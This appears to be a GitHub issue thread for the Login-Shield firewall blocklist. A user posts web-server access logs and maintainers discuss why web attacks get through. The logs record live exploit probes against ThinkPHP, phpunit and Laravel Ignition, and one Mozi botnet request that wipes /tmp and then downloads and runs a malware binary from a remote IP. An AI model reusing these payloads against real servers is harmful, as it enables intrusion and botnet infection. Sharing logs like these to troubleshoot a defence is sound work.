<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 301 736 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /console/ HTTP/1.1" 301 692 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:18 +0200] "GET /_ignition/execute-solution HTTP/1.1" 301 728 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 209.141.51.242 - - [01/May/2021:02:43:12 +0200] "GET /config/getuser?index=0 HTTP/1.1" 301 720 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
<sld>.<tld>:80 162.62.133.40 - - [01/May/2021:03:42:03 +0200] "GET / HTTP/1.1" 301 676 "-" "-"
<sld>.<tld>:80 162.62.133.40 - - [01/May/2021:03:42:13 +0200] "GET / HTTP/1.0" 301 676 "-" "-"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:25 +0200] "POST /_ignition/execute-solution HTTP/1.1" 301 709 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:26 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 757 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:28 +0200] "GET /login HTTP/1.1" 301 667 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:29 +0200] "GET /jenkins/login HTTP/1.1" 301 683 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:30 +0200] "GET /manager/html HTTP/1.1" 301 681 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:31 +0200] "GET /wp-login.php HTTP/1.1" 301 681 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:33 +0200] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP HTTP/1.1" 301 875 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X $
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:11:39 +0200] "GET / HTTP/1.1" 301 713 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:11:56 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:12:17 +0200] "GET /favicon.ico HTTP/1.1" 301 698 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
<sld>.<tld>:80 202.150.149.82 - - [01/May/2021:05:22:59 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
<sld>.<tld>:80 84.232.147.190 - - [01/May/2021:06:03:48 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
<sld>.<tld>:80 128.14.134.170 - - [01/May/2021:06:42:01 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
<sld>.<tld>:80 209.141.33.74 - - [01/May/2021:07:38:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 301 759 "http://84.75.144.173:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
<sld>.<tld>:80 192.227.137.68 - - [01/May/2021:07:53:36 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
<sld>.<tld>:80 61.3.149.229 - - [01/May/2021:09:14:50 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://61.3.149.229:40707/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 901 "-" "Hello, world"
<sld>.<tld>:80 51.254.59.113 - - [01/May/2021:10:10:01 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
<sld>.<tld>:80 180.149.125.175 - - [01/May/2021:11:23:31 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
<sld>.<tld>:80 192.241.219.233 - - [01/May/2021:11:53:44 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 zgrab/0.x"
<sld>.<tld>:80 54.70.40.11 - - [01/May/2021:12:01:59 +0200] "GET /robots.txt HTTP/1.1" 301 674 "-" "Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)"
<sld>.<tld>:80 54.70.40.11 - - [01/May/2021:12:02:19 +0200] "GET /robots.txt HTTP/1.1" 301 682 "-" "Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)"
<sld>.<tld>:80 209.141.33.74 - - [01/May/2021:12:27:45 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 301 759 "http://84.75.144.173:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
<sld>.<tld>:80 80.82.78.39 - - [01/May/2021:12:40:37 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0"
<sld>.<tld>:80 80.82.78.39 - - [01/May/2021:12:40:53 +0200] "\x16\x03\x01" 400 0 "-" "-"
<sld>.<tld>:80 185.156.73.64 - - [01/May/2021:12:51:01 +0200] "GET / HTTP/1.0" 301 673 "-" "\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\""
<sld>.<tld>:80 89.248.170.22 - - [01/May/2021:12:53:10 +0200] "HEAD / HTTP/1.0" 301 341 "-" "-"
<sld>.<tld>:80 91.211.251.148 - - [01/May/2021:12:54:59 +0200] "GET / HTTP/1.1" 301 710 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36,gzip(gfe)"

Don't know what to think of it.

DPsystems commented 3 years ago

Note that unless you're blocking ports 80/443, Login-Shield by default isn't stopping web attacks.

HOWEVER, I AM working on another version called "Web-Shield" with a different set of blacklists to address this issue. I've been testing it now for months and I'm pretty close to making it available.

I think ideally, the web defense needs to be separate from the login-defense. To block web attacks you primarily want to block the web ports from servers, not users, so it needs a bit of a different IP database.

DPsystems commented 3 years ago

If you're still having issues, remember to note the version/OS you're using. See if you can confirm iptables is logging the blocked requests and what form those log entries are appearing as?

ychaouche commented 3 years ago

@aakerbeere did you uncomment this line? Otherwise login-shield won't block anything.

aakerbeere commented 3 years ago

The line is actually uncommented in the device's local instance of ".../set-iptables.sh" but not in ".../set-iptables.sh-config".

ychaouche commented 3 years ago

@aakerbeere ssh on port 22 ?